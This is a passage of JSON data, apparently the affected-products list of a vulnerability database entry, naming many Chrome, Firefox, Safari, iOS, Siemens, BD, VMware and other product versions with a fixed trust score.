"eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.22" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.493.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.216" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.103" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "64.0.3282.144" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "59.0.3071.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.327" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.186" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.956.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1662.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.49" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.9" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1183.0" }, { "model": "sinumerik tcu", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "30.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.217" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.6.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491036" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.7" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "45.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.522.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "49.0.2623.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.23" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.5" }, { "model": "sinumerik d sl ncu720.3b", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "840" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.12" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "61.0.3163.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.622.1" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.91" }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "8.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.159" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1062.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.152.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.556.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.161" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.772.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.125" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1059.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.398.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.140" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "47.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.53" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.321" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.45" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.870.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1006.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.91" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1653.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "28.0" }, { "model": "pyxis anesthesia es", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.58" }, { "model": "enterprise linux for power little endian extended update supp", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.551.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1083.0" }, { "model": "windows for x64-based systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "8.10" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "62.0.3202.89" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.301" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.335" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.695.0" }, { "model": "windows for 32-bit systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "8.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.39" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.2" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.1.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1021" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1688.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.325" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.24" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.0.5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.732.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1290.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.26" }, { "model": "vcloud usage meter", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.712.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "49.0.2566.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1286.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.558.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.2" }, { "model": "simatic ipc827c", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.822.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.120" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.665.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.629.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "49" }, { "model": "sql server r2 for 32-bit systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "200830" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.339" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.15" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.763.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "15.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.947.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1276.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.168" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.878.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "19.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.42" }, { "model": "firefox", "scope": "ne", "trust": 0.3, "vendor": "mozilla", "version": "57.0.4" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.542.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1663.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.48" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.837.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1014" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.70" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.3.1" }, { "model": "simatic ipc847d", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.324" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.929.0" }, { "model": "simatic ipc547g", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.510.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.1549" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.410.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.787.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.323" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.292.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.405.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.212.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.684.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.796.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.153.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.35" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.134.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1076.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1307.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.757.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.15" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.79" }, { "model": "facscelesta", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.20" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.5" }, { "model": "enterprise linux for ibm z systems extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-6.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.55" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.31" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.45" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.40" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "50.0.2661.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.832.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1066.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.316" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.514.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.221.8" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.403.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.55" }, { "model": "simatic field pg m5", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "43.0.2357" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "33.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.304.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1018.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1278.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.229" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.572.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.146" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.139" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.22" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.60" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1282.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.303.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.100" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", 